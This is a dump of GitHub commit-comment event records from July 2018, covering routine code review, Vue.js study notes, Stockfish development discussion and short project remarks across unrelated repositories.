{"id":"8033990019","type":"CommitCommentEvent","actor":{"login":"myronliu347"},"repo":{"name":"museui/muse-ui"},"payload":{"comment":{"id":29874340,"position":null,"line":null,"path":null,"commit_id":"774f8bdf345df979070d8e4e62f18b51656e8ded","created_at":"2018-07-29T13:32:47Z","updated_at":"2018-07-29T13:32:47Z","author_association":"MEMBER","body":"#1088 "}},"created_at":"2018-07-29T13:32:47Z"}
{"id":"8033993158","type":"CommitCommentEvent","actor":{"login":"abarganier"},"repo":{"name":"TulkasLaugh/HankVim"},"payload":{"comment":{"id":29874347,"position":null,"line":null,"path":null,"commit_id":"ec3460e0d22af50750411556ebec41072dc1efd7","created_at":"2018-07-29T13:35:10Z","updated_at":"2018-07-29T13:35:10Z","author_association":"NONE","body":"Does this add VR support?"}},"created_at":"2018-07-29T13:35:10Z"}
{"id":"8034000166","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29874362,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-29T13:40:13Z","updated_at":"2018-07-29T13:40:13Z","author_association":"NONE","body":"This looks promising, if it passed, can you also implement it in the cluster branch?\r\nEssentially you can change `MPI_AllReduce` to `MPI_AllGather` and do voting on each node."}},"created_at":"2018-07-29T13:40:13Z"}
{"id":"8034000791","type":"CommitCommentEvent","actor":{"login":"ArranTuna"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29874363,"position":null,"line":null,"path":null,"commit_id":"0cffa9215f4601e42b2dfbc254040aeda3caa8f0","created_at":"2018-07-29T13:40:41Z","updated_at":"2018-07-29T13:40:41Z","author_association":"CONTRIBUTOR","body":"Yep, was a very buggy command and had to script my own whowas which was better anyway as you can add extra features. Someone could make a source path for a whowas to be added to admin resource."}},"created_at":"2018-07-29T13:40:41Z"}
{"id":"8034002191","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29874368,"position":null,"line":null,"path":null,"commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T13:41:45Z","updated_at":"2018-07-29T13:41:45Z","author_association":"OWNER","body":"1. 三括号的形式：{{{}}} 既等于 v-html 的形式，vue.2.0 这种语法已经不存在？\r\nvue 2.x 的文档中只提了 v-html，并没有 {{{}}}\r\nvue 1.0 的文档中只有 {{{}}}，没有 v-html\r\n2. ` 该符号在 es6 的模板语法代表的意义，\r\n3. 在 github 中维护，以 PR 的形式改进。\r\n4. ` 该符号在 es6 的模板语法代表的意义。\r\nES6 的模板字符串（template string）是增强版的字符串，用反引号（`）标识。它可以当作普通字符串使用，也可以用来定义多行字符串，或者在字符串中嵌入变量。\r\n```\r\n#ES5 写法\r\n$('#result').append(\r\n  'There are <b>' + basket.count + '</b> ' +\r\n  'items in your basket, ' +\r\n  '<em>' + basket.onSale +\r\n  '</em> are on sale!'\r\n);\r\n```\r\n```\r\n#ES6 写法\r\n$('#result').append(`\r\n  There are <b>${basket.count}</b> items\r\n  in your basket, <em>${basket.onSale}</em>\r\n  are on sale!\r\n`);\r\n```\r\n\r\n5. 少写标点导致报错的问题，不是 vue 的问题，找报错用浏览器也不合适。应该在编辑器的用 eslint 来规避。\r\n6. 以下两种形式是等价的。selectTab(index) 这种就等于直接调用了。\r\n```\r\nselectTab(index) {\r\n\tthis.activeTab = id\r\n}\r\n\r\nselectTab: function(index) {}\r\n```\r\n\r\n7. (function foo() {})() 直接调用\r\nfunction foo() {} () 直接调用（但编辑器可能读不懂最后的括号是什么意思）\r\nfunction foo() {} 只是个函数，不会直接调用\r\nconst a = function foo() {};\r\na() 才是直接调用。\r\n\r\n8. `:click=\"selectTab(index)\" :class=\"{ 'is-active': activeTab == index }\"` 浏览器无法渲染，也没有报错（比较老的 vue 版本没有报错。）。或者可以渲染，但是有报错： [Vue warn]: You may have an infinite update loop in a component render function.\r\n但 `:click=\"selectTab(index)\"` 可以正常渲染。\r\n原因：\r\nv-bind 用来绑定属性。@click 错写成 :click，这里就是绑定一个叫做 click 的属性，值是一个立即执行的函数。\r\n在 nav-item 渲染过程中，当第一个 nav-item 被渲染时，selectTab(index) 被执行。activeTab 还是 0，但因为 activeTab 默认值为 0 ，所以没问题。当渲染到第二个 nav-item 时，activeTab 被赋值为 1，也就是说 data 变了，根据 vue 的原理，涉及该数据的 DOM 会重新执行渲染(并不是所有 DOM 结构都会被重新渲染)。永远在 1 和 0 之间渲染，就会被卡死。\r\n[深入响应式原理 — Vue.js](https://cn.vuejs.org/v2/guide/reactivity.html#%E5%A6%82%E4%BD%95%E8%BF%BD%E8%B8%AA%E5%8F%98%E5%8C%96)\r\n9. 当 v-if 与 v-for 一起使用时，v-for 具有比 v-if 更高的优先级。\r\n10. v-for / v-if 的先后级，以及这里的最优写法。"}},"created_at":"2018-07-29T13:41:45Z"}
{"id":"8034002447","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29874369,"position":null,"line":null,"path":null,"commit_id":"42f35329b1b2b6cb479f259513da744631b59f7b","created_at":"2018-07-29T13:41:58Z","updated_at":"2018-07-29T13:41:58Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [039 - Desenvolver Repository - Tipo Pessoa e Pessoa](https://trello.com/c/k4BCv1z5/47-039-desenvolver-repository-tipo-pessoa-e-pessoa)"}},"created_at":"2018-07-29T13:41:58Z"}
{"id":"8034003963","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29874371,"position":null,"line":null,"path":null,"commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T13:43:04Z","updated_at":"2018-07-29T13:43:04Z","author_association":"OWNER","body":"1. 三括号的形式：{{{}}} 既等于 v-html 的形式，vue.2.0 这种语法已经不存在？\r\nvue 2.x 的文档中只提了 v-html，并没有 {{{}}}\r\nvue 1.0 的文档中只有 {{{}}}，没有 v-html\r\n2. 在 github 中维护，以 PR 的形式改进。\r\n3. ` 该符号在 es6 的模板语法代表的意义。\r\nES6 的模板字符串（template string）是增强版的字符串，用反引号（`）标识。它可以当作普通字符串使用，也可以用来定义多行字符串，或者在字符串中嵌入变量。\r\n```\r\n#ES5 写法\r\n$('#result').append(\r\n  'There are <b>' + basket.count + '</b> ' +\r\n  'items in your basket, ' +\r\n  '<em>' + basket.onSale +\r\n  '</em> are on sale!'\r\n);\r\n```\r\n```\r\n#ES6 写法\r\n$('#result').append(`\r\n  There are <b>${basket.count}</b> items\r\n  in your basket, <em>${basket.onSale}</em>\r\n  are on sale!\r\n`);\r\n```\r\n4. 少写标点导致报错的问题，不是 vue 的问题，找报错用浏览器也不合适。应该在编辑器的用 eslint 来规避。\r\n5. 以下两种形式是等价的。selectTab(index) 这种就等于直接调用了。\r\n```\r\nselectTab(index) {\r\n\tthis.activeTab = id\r\n}\r\n\r\nselectTab: function(index) {}\r\n```\r\n6. (function foo() {})() 直接调用\r\nfunction foo() {} () 直接调用（但编辑器可能读不懂最后的括号是什么意思）\r\nfunction foo() {} 只是个函数，不会直接调用\r\nconst a = function foo() {};\r\na() 才是直接调用。\r\n7. `:click=\"selectTab(index)\" :class=\"{ 'is-active': activeTab == index }\"` 浏览器无法渲染，也没有报错（比较老的 vue 版本没有报错。）。或者可以渲染，但是有报错： [Vue warn]: You may have an infinite update loop in a component render function.\r\n但 `:click=\"selectTab(index)\"` 可以正常渲染。\r\n原因：\r\nv-bind 用来绑定属性。@click 错写成 :click，这里就是绑定一个叫做 click 的属性，值是一个立即执行的函数。\r\n在 nav-item 渲染过程中，当第一个 nav-item 被渲染时，selectTab(index) 被执行。activeTab 还是 0，但因为 activeTab 默认值为 0 ，所以没问题。当渲染到第二个 nav-item 时，activeTab 被赋值为 1，也就是说 data 变了，根据 vue 的原理，涉及该数据的 DOM 会重新执行渲染(并不是所有 DOM 结构都会被重新渲染)。永远在 1 和 0 之间渲染，就会被卡死。\r\n[深入响应式原理 — Vue.js](https://cn.vuejs.org/v2/guide/reactivity.html#%E5%A6%82%E4%BD%95%E8%BF%BD%E8%B8%AA%E5%8F%98%E5%8C%96)\r\n8. 当 v-if 与 v-for 一起使用时，v-for 具有比 v-if 更高的优先级。"}},"created_at":"2018-07-29T13:43:04Z"}
{"id":"8034006279","type":"CommitCommentEvent","actor":{"login":"myronliu347"},"repo":{"name":"museui/muse-ui"},"payload":{"comment":{"id":29874380,"position":null,"line":null,"path":null,"commit_id":"ee2364b1f9dd6cb55596fd670383f6e6cf113514","created_at":"2018-07-29T13:44:39Z","updated_at":"2018-07-29T13:44:39Z","author_association":"MEMBER","body":"#1089 "}},"created_at":"2018-07-29T13:44:39Z"}
{"id":"8034006344","type":"CommitCommentEvent","actor":{"login":"dheerajnambr"},"repo":{"name":"aws-quickstart/quickstart-mongodb"},"payload":{"comment":{"id":29874381,"position":null,"line":null,"path":null,"commit_id":"ec884f0cfa66f0d5ace7a84dbf2d6be8ea8eda87","created_at":"2018-07-29T13:44:42Z","updated_at":"2018-07-29T13:44:42Z","author_association":"NONE","body":"Hi Vinod ,\nThank you for the quick reply.\n\nRegards,\nDheeraj\n\nOn Sun 29 Jul, 2018, 6:53 PM Vinod Shukla, <notifications@github.com> wrote:\n\n> Hi Dheeraj,\n>\n> Please refer to this explanation\n> https://github.com/aws-quickstart/quickstart-mongodb/issues/17 and open a\n> new issue if you need any further clarification.\n>\n> Regards,\n> Vinod\n>\n> On Wed, Jul 25, 2018 at 6:29 AM Dheeraj P.T <notifications@github.com>\n> wrote:\n>\n> > Hi Could you please help me to understand orchestrator.sh script ?. What\n> > exactly does the dynamodb table does in those script ?\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/aws-quickstart/quickstart-mongodb/commit/ec884f0cfa66f0d5ace7a84dbf2d6be8ea8eda87#commitcomment-29827065\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AAmGqWOTcKWvGk3cOGTcw16r-LzZQfZAks5uKEiigaJpZM4VbuJD\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/aws-quickstart/quickstart-mongodb/commit/ec884f0cfa66f0d5ace7a84dbf2d6be8ea8eda87#commitcomment-29874297>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AbQzyC_qjb-8CClYGZ4h2DJiY6MUDPPSks5uLbc2gaJpZM4VbuJD>\n> .\n>\n"}},"created_at":"2018-07-29T13:44:42Z"}
{"id":"8034006456","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29874382,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-29T13:44:46Z","updated_at":"2018-07-29T13:44:46Z","author_association":"OWNER","body":"Thanks, I would have to study the cluster branch but yes, it sounds definitely  something nice to do"}},"created_at":"2018-07-29T13:44:46Z"}
{"id":"8034009091","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29874396,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-29T13:46:34Z","updated_at":"2018-07-29T13:46:34Z","author_association":"NONE","body":"If this passes i would retest at 8 threads for real vote checking. But lets see.\r\ngood luck!"}},"created_at":"2018-07-29T13:46:34Z"}
{"id":"8034009652","type":"CommitCommentEvent","actor":{"login":"Hacktin"},"repo":{"name":"Hacktin/N-Layer-Project-to-Student"},"payload":{"comment":{"id":29874399,"position":null,"line":null,"path":null,"commit_id":"90eefa8544c9e92c630173e9d48eff9a3074819b","created_at":"2018-07-29T13:46:56Z","updated_at":"2018-07-29T13:46:56Z","author_association":"OWNER","body":"Entity Layer"}},"created_at":"2018-07-29T13:46:56Z"}
{"id":"8034013245","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29874405,"position":null,"line":null,"path":null,"commit_id":"e8b501cf9ff2bffe4266ac70a208564ee1f7f438","created_at":"2018-07-29T13:49:24Z","updated_at":"2018-07-29T13:49:24Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-91](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-91).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-91-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-29T13:49:24Z"}
{"id":"8034016048","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29874406,"position":null,"line":null,"path":null,"commit_id":"0cffa9215f4601e42b2dfbc254040aeda3caa8f0","created_at":"2018-07-29T13:51:24Z","updated_at":"2018-07-29T13:51:24Z","author_association":"MEMBER","body":"@ArranTuna Yep, created an issue for this to be added here: https://github.com/multitheftauto/mtasa-resources/issues/116"}},"created_at":"2018-07-29T13:51:24Z"}
{"id":"8034017002","type":"CommitCommentEvent","actor":{"login":"raminkhalaji"},"repo":{"name":"raminkhalaji/Hamrahan"},"payload":{"comment":{"id":29874408,"position":null,"line":null,"path":null,"commit_id":"29aabf46df39f8b7e6f01615c602d2f5d1f7b6a8","created_at":"2018-07-29T13:52:03Z","updated_at":"2018-07-29T13:52:03Z","author_association":"OWNER","body":"به نظرم تا اینجا کاملا مناسب است."}},"created_at":"2018-07-29T13:52:03Z"}
{"id":"8034017699","type":"CommitCommentEvent","actor":{"login":"super-cert"},"repo":{"name":"super-cert/network_pcap"},"payload":{"comment":{"id":29874409,"position":null,"line":null,"path":null,"commit_id":"78ea03a15457ed310139d201e18e1f9bd82118da","created_at":"2018-07-29T13:52:31Z","updated_at":"2018-07-29T13:52:31Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-29T13:52:31Z"}
{"id":"8034021843","type":"CommitCommentEvent","actor":{"login":"Phylogeny"},"repo":{"name":"Phylogeny/ExtraBitManipulation"},"payload":{"comment":{"id":29874417,"position":null,"line":null,"path":null,"commit_id":"34428b673850ac616c468e57e86b218e0530c254","created_at":"2018-07-29T13:55:12Z","updated_at":"2018-07-29T13:55:12Z","author_association":"OWNER","body":"The comment for this commit should instead read:\r\n\r\n> Added compatibility with Custom NPCs. #17"}},"created_at":"2018-07-29T13:55:12Z"}
{"id":"8034021993","type":"CommitCommentEvent","actor":{"login":"raminkhalaji"},"repo":{"name":"raminkhalaji/Hamrahan"},"payload":{"comment":{"id":29874418,"position":1,"line":1,"path":"Document","commit_id":"29aabf46df39f8b7e6f01615c602d2f5d1f7b6a8","created_at":"2018-07-29T13:55:17Z","updated_at":"2018-07-29T13:55:17Z","author_association":"OWNER","body":"روی این بند شک وجود دارد"}},"created_at":"2018-07-29T13:55:17Z"}
{"id":"8034022993","type":"CommitCommentEvent","actor":{"login":"TomTheCreator"},"repo":{"name":"Plajer-Lair/Village_Defense"},"payload":{"comment":{"id":29874420,"position":null,"line":null,"path":null,"commit_id":"582f0e78d0dea72ca05062212b6c4e84a57f87b6","created_at":"2018-07-29T13:55:57Z","updated_at":"2018-07-29T13:55:57Z","author_association":"COLLABORATOR","body":"Thanks!"}},"created_at":"2018-07-29T13:55:57Z"}
{"id":"8034023193","type":"CommitCommentEvent","actor":{"login":"Phylogeny"},"repo":{"name":"Phylogeny/ExtraBitManipulation"},"payload":{"comment":{"id":29874421,"position":null,"line":null,"path":null,"commit_id":"4ab18fd6308ca71fb734a230620fe444424abf33","created_at":"2018-07-29T13:56:06Z","updated_at":"2018-07-29T13:56:06Z","author_association":"OWNER","body":"The comment for this commit should instead read:\r\n\r\n> Added compatibility with Custom NPCs."}},"created_at":"2018-07-29T13:56:06Z"}
{"id":"8034024292","type":"CommitCommentEvent","actor":{"login":"Yasunari15"},"repo":{"name":"UT-TeX/ut-tex.github.io"},"payload":{"comment":{"id":29874424,"position":null,"line":null,"path":null,"commit_id":"2640a73fd1bb0d2c633d836b191f5363bf4979d1","created_at":"2018-07-29T13:56:51Z","updated_at":"2018-07-29T13:56:51Z","author_association":"MEMBER","body":"@puripuri2100 いまTweetに気付きました。申し訳ありません。お待ちしております。Membersに掲載する際のProfileを考えておいて下さい。よろしくお願いいたします。"}},"created_at":"2018-07-29T13:56:51Z"}
{"id":"8034024513","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"uavaustin/orchestra"},"payload":{"comment":{"id":29874425,"position":41,"line":77,"path":"services/telemetry/src/util.js","commit_id":"13ec690da39c21f3d1586a884f425b133e22ddca","created_at":"2018-07-29T13:56:59Z","updated_at":"2018-07-29T13:56:59Z","author_association":"MEMBER","body":"Technically you could make this a lambda that returns `done` (`() => done`) since it already returns a Promise and you're just wrapping it with another Promise"}},"created_at":"2018-07-29T13:56:59Z"}
{"id":"8034025940","type":"CommitCommentEvent","actor":{"login":"LinuxCrafts"},"repo":{"name":"SimpleProgramsStudios/programs"},"payload":{"comment":{"id":29874429,"position":8,"line":6,"path":"InstallLibsNeeded","commit_id":"bbff5e6e75ec012df1f9459ed330c791e5ec8836","created_at":"2018-07-29T13:58:00Z","updated_at":"2018-07-29T13:58:00Z","author_association":"MEMBER","body":"Why?"}},"created_at":"2018-07-29T13:58:00Z"}
{"id":"8034026907","type":"CommitCommentEvent","actor":{"login":"codingbunnys"},"repo":{"name":"SimpleProgramsStudios/programs"},"payload":{"comment":{"id":29874431,"position":8,"line":6,"path":"InstallLibsNeeded","commit_id":"bbff5e6e75ec012df1f9459ed330c791e5ec8836","created_at":"2018-07-29T13:58:40Z","updated_at":"2018-07-29T13:58:40Z","author_association":"MEMBER","body":"Why?!?"}},"created_at":"2018-07-29T13:58:40Z"}
{"id":"8034029978","type":"CommitCommentEvent","actor":{"login":"Plastefuchs84"},"repo":{"name":"rxseger/homebridge-bme280"},"payload":{"comment":{"id":29874444,"position":null,"line":null,"path":null,"commit_id":"4bec739e3f493b55bb7080f9064f44931a0f0d88","created_at":"2018-07-29T14:00:37Z","updated_at":"2018-07-29T14:00:37Z","author_association":"NONE","body":"Hello ! I am having the trouble copying the bsc_bme680 and a cofig document because I cannot find it. Where do I find them?"}},"created_at":"2018-07-29T14:00:37Z"}
{"id":"8034030261","type":"CommitCommentEvent","actor":{"login":"codingbunnys"},"repo":{"name":"SimpleProgramsStudios/programs"},"payload":{"comment":{"id":29874448,"position":8,"line":6,"path":"InstallLibsNeeded","commit_id":"bbff5e6e75ec012df1f9459ed330c791e5ec8836","created_at":"2018-07-29T14:00:50Z","updated_at":"2018-07-29T14:00:50Z","author_association":"MEMBER","body":"also do not forget to run as admin if you have a seperate admin password(\r\n`su`\r\nENTER PASSWORD FOR ROOT\r\n`cd [DOWNLOAD OF FILE LOCATION]`\r\n`chmod 755 InstallLibsNeeded\r\n./InstallLibsNeeded`\r\n)"}},"created_at":"2018-07-29T14:00:50Z"}
{"id":"8034031486","type":"CommitCommentEvent","actor":{"login":"kessler"},"repo":{"name":"ramybenaroya/pickpick"},"payload":{"comment":{"id":29874451,"position":null,"line":null,"path":null,"commit_id":"77941f7680d27ef1de64def91a57f3aa07ef223c","created_at":"2018-07-29T14:01:37Z","updated_at":"2018-07-29T14:01:37Z","author_association":"NONE","body":"Hey @ramybenaroya , the API part in the readme is autogenerated using `documentationjs` (I should probably document that)\r\n\r\nPlease let me know if you need any clarifications or just want to chat about `pickpick`"}},"created_at":"2018-07-29T14:01:37Z"}
{"id":"8034032251","type":"CommitCommentEvent","actor":{"login":"RinatValiullov"},"repo":{"name":"denar90/dictionary"},"payload":{"comment":{"id":29874454,"position":8,"line":871,"path":"dictionary.md","commit_id":"6fb2fbdf31ca263ed8e8f9aacac71050725a548f","created_at":"2018-07-29T14:02:06Z","updated_at":"2018-07-29T14:02:06Z","author_association":"NONE","body":"опечатка в слове: **п**ервая"}},"created_at":"2018-07-29T14:02:06Z"}
{"id":"8034035220","type":"CommitCommentEvent","actor":{"login":"peopleLie"},"repo":{"name":"peopleLie/tutorial"},"payload":{"comment":{"id":29874463,"position":null,"line":null,"path":null,"commit_id":"8b42146e80323cb21b105bf34acbfd36e5563625","created_at":"2018-07-29T14:04:03Z","updated_at":"2018-07-29T14:04:03Z","author_association":"OWNER","body":"!!!!!!!_kid"}},"created_at":"2018-07-29T14:04:03Z"}
{"id":"8034038540","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29874470,"position":null,"line":null,"path":null,"commit_id":"bf41eb0237f3289ca2c70871483d3911b7e8fc39","created_at":"2018-07-29T14:06:21Z","updated_at":"2018-07-29T14:06:21Z","author_association":"CONTRIBUTOR","body":"No interproscan/5.30-69.0/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-29T14:06:21Z"}
{"id":"8034038824","type":"CommitCommentEvent","actor":{"login":"qinhanmin2014"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29874471,"position":null,"line":null,"path":null,"commit_id":"89b25a586e7774f57a717d7f371fc62763bce151","created_at":"2018-07-29T14:06:32Z","updated_at":"2018-07-29T14:06:32Z","author_association":"MEMBER","body":"@jnothman Circle fails again : ``You can't use `macro parameter character #' in restricted horizontal mode.``"}},"created_at":"2018-07-29T14:06:32Z"}
{"id":"8034041102","type":"CommitCommentEvent","actor":{"login":"isgoodday"},"repo":{"name":"isgoodday/First"},"payload":{"comment":{"id":29874475,"position":1,"line":1,"path":".gitattributes","commit_id":"19cc0cf701116483545145aef51327dbbaf4042c","created_at":"2018-07-29T14:08:02Z","updated_at":"2018-07-29T14:08:02Z","author_association":"OWNER","body":"AA"}},"created_at":"2018-07-29T14:08:02Z"}
{"id":"8034041892","type":"CommitCommentEvent","actor":{"login":"rico6822"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29874478,"position":null,"line":null,"path":null,"commit_id":"aa5b2a973e3cc4657a231cb6ac633579c8acf03d","created_at":"2018-07-29T14:08:34Z","updated_at":"2018-07-29T14:08:34Z","author_association":"NONE","body":"Good."}},"created_at":"2018-07-29T14:08:34Z"}
{"id":"8034045427","type":"CommitCommentEvent","actor":{"login":"xkonni"},"repo":{"name":"xkonni/snapcastr"},"payload":{"comment":{"id":29874489,"position":null,"line":null,"path":null,"commit_id":"3fc58605f3aa41f27ec3ae63fa536937fa7d9852","created_at":"2018-07-29T14:11:01Z","updated_at":"2018-07-29T14:11:01Z","author_association":"OWNER","body":"Awesome, thanks!"}},"created_at":"2018-07-29T14:11:01Z"}
{"id":"8034047252","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29874491,"position":null,"line":null,"path":null,"commit_id":"89b25a586e7774f57a717d7f371fc62763bce151","created_at":"2018-07-29T14:12:13Z","updated_at":"2018-07-29T14:12:13Z","author_association":"MEMBER","body":"Yeah, okay. Reverting back to the backslashes. At least for now.​\n"}},"created_at":"2018-07-29T14:12:13Z"}
{"id":"8034053460","type":"CommitCommentEvent","actor":{"login":"srowen"},"repo":{"name":"apache/spark-website"},"payload":{"comment":{"id":29874517,"position":5,"line":142,"path":"site/sitemap.xml","commit_id":"d86cffd1918f9cb8f25d7beb0ae65f814f5232bd","created_at":"2018-07-29T14:16:21Z","updated_at":"2018-07-29T14:16:21Z","author_association":"MEMBER","body":"@gatorsmile I think this change accidentally went in. (I've done it too) It happens when the result of `jekyll serve` is left in the branch and committed. I'm going to push another update now so will just overwrite it."}},"created_at":"2018-07-29T14:16:21Z"}
{"id":"8034054841","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29874520,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T14:17:20Z","updated_at":"2018-07-29T14:17:20Z","author_association":"MEMBER","body":"It's all advertising from here.\r\n\r\n"}},"created_at":"2018-07-29T14:17:20Z"}
{"id":"8034055463","type":"CommitCommentEvent","actor":{"login":"SKalt"},"repo":{"name":"spadarian/docblock-python"},"payload":{"comment":{"id":29874521,"position":38,"line":200,"path":"lib/docblock-python.js","commit_id":"3f1453ae8801c640e35551d294ef800791da40ee","created_at":"2018-07-29T14:17:44Z","updated_at":"2018-07-29T14:17:44Z","author_association":"NONE","body":"Consider swapping from the bitwise & to the boolean &&.  It looks like the order of operations works and you correctly create truthy/falsy 1s/0s, but `x.length > 0 && x.includes('self')` should be more type-safe and IMO more readable."}},"created_at":"2018-07-29T14:17:44Z"}
{"id":"8034057058","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29874522,"position":11,"line":86,"path":"compiler/src/dotty/tools/dotc/core/tasty/TastyPickler.scala","commit_id":"c905ff287d03c56d742566e69d3e3bb5b1dec1c4","created_at":"2018-07-29T14:18:51Z","updated_at":"2018-07-29T14:18:51Z","author_association":"MEMBER","body":"Xoring something with 0 does not change the value so I don't see the point of the if"}},"created_at":"2018-07-29T14:18:51Z"}
{"id":"8034058067","type":"CommitCommentEvent","actor":{"login":"qinhanmin2014"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29874525,"position":null,"line":null,"path":null,"commit_id":"89b25a586e7774f57a717d7f371fc62763bce151","created_at":"2018-07-29T14:19:32Z","updated_at":"2018-07-29T14:19:32Z","author_association":"MEMBER","body":"Sigh. Reverted. Let's focus on the release."}},"created_at":"2018-07-29T14:19:32Z"}
{"id":"8034058118","type":"CommitCommentEvent","actor":{"login":"tssva"},"repo":{"name":"tssva/oksh"},"payload":{"comment":{"id":29874526,"position":null,"line":null,"path":null,"commit_id":"9dd6cbd735039688527e81d1269429d81d54aef9","created_at":"2018-07-29T14:19:34Z","updated_at":"2018-07-29T14:19:34Z","author_association":"OWNER","body":"When I added asprintf rescue.sh was updated to link asprintf.o into oksh but compilation of asprintf was not added. "}},"created_at":"2018-07-29T14:19:34Z"}
{"id":"8034073392","type":"CommitCommentEvent","actor":{"login":"Alexanderallenbrown"},"repo":{"name":"joaquinfont/DeerTraining"},"payload":{"comment":{"id":29874568,"position":32,"line":104,"path":"Deer.py","commit_id":"055a1f4b202a77b17fee7d2871d53d4e242b5a72","created_at":"2018-07-29T14:29:38Z","updated_at":"2018-07-29T14:29:38Z","author_association":"COLLABORATOR","body":"I don't know if drive[:] is necessary here. just 'drive' would probably work. what's the data type coming out... list, or array?"}},"created_at":"2018-07-29T14:29:38Z"}
{"id":"8034073904","type":"CommitCommentEvent","actor":{"login":"codabrink"},"repo":{"name":"bbatsov/prelude"},"payload":{"comment":{"id":29874572,"position":null,"line":null,"path":null,"commit_id":"d6786e33f1bd52ff37af9c826be7db0c70c96b42","created_at":"2018-07-29T14:29:58Z","updated_at":"2018-07-29T14:29:58Z","author_association":"NONE","body":"Can we remove this, please?\r\nHaving to read window numbers and reach for the number keys every time I want to switch windows is a significant hassle.\r\n`s-w` is fine if I want to use ace-window, but in most cases; I don't."}},"created_at":"2018-07-29T14:29:58Z"}
{"id":"8034073920","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874573,"position":null,"line":null,"path":null,"commit_id":"24feb13e697b81b3de54eacb6ed58d263ac176e9","created_at":"2018-07-29T14:29:59Z","updated_at":"2018-07-29T14:29:59Z","author_association":"OWNER","body":"Please run [build]"}},"created_at":"2018-07-29T14:29:59Z"}
{"id":"8034074879","type":"CommitCommentEvent","actor":{"login":"huangdenghe"},"repo":{"name":"mtdhb/api"},"payload":{"comment":{"id":29874582,"position":null,"line":null,"path":null,"commit_id":"9c946d455388d4031596189060dccc031becf332","created_at":"2018-07-29T14:30:30Z","updated_at":"2018-07-29T14:30:30Z","author_association":"MEMBER","body":"@zhuweiyou 自动补全一把梭"}},"created_at":"2018-07-29T14:30:30Z"}
{"id":"8034075054","type":"CommitCommentEvent","actor":{"login":"faridsamadov2004"},"repo":{"name":"faridsamadov2004/sivengames"},"payload":{"comment":{"id":29874584,"position":null,"line":null,"path":null,"commit_id":"b1ed5e50caa60b43c3dd41a5be1f1ff9b663a37c","created_at":"2018-07-29T14:30:37Z","updated_at":"2018-07-29T14:30:37Z","author_association":"OWNER","body":"Файлы для сайта"}},"created_at":"2018-07-29T14:30:37Z"}
{"id":"8034075317","type":"CommitCommentEvent","actor":{"login":"aleesang"},"repo":{"name":"aleesang/milestone-project-one"},"payload":{"comment":{"id":29874585,"position":null,"line":null,"path":null,"commit_id":"7ac8b4cbe831ab4860c82dd509ca46617b2b52b0","created_at":"2018-07-29T14:30:46Z","updated_at":"2018-07-29T14:30:46Z","author_association":"OWNER","body":"playing around with themes in settings. did not want to keep."}},"created_at":"2018-07-29T14:30:46Z"}
{"id":"8034075872","type":"CommitCommentEvent","actor":{"login":"eddiejunzhang"},"repo":{"name":"eddiejunzhang/Windows_Python_Scrap"},"payload":{"comment":{"id":29874586,"position":null,"line":null,"path":null,"commit_id":"12ea6f2740e74425bfe2e61ce6426ddd1ea7e6f9","created_at":"2018-07-29T14:31:09Z","updated_at":"2018-07-29T14:31:09Z","author_association":"OWNER","body":"I update the code."}},"created_at":"2018-07-29T14:31:09Z"}
